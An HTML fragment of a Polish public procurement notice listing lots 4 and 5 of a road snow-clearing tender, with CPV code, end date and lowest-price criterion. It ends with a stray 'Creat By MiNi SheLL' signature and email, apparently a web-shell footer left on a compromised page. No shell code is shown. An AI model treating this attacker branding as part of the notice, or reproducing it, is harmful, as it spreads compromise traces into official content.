<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr IV Nośnik pługa ciężkiego (pług własny Wykonawcy lub użyczony z RDW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dśnieżanie dróg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Równiarka - 3 szt. (równiarka własna Wykonawcy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odśnieżanie dróg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com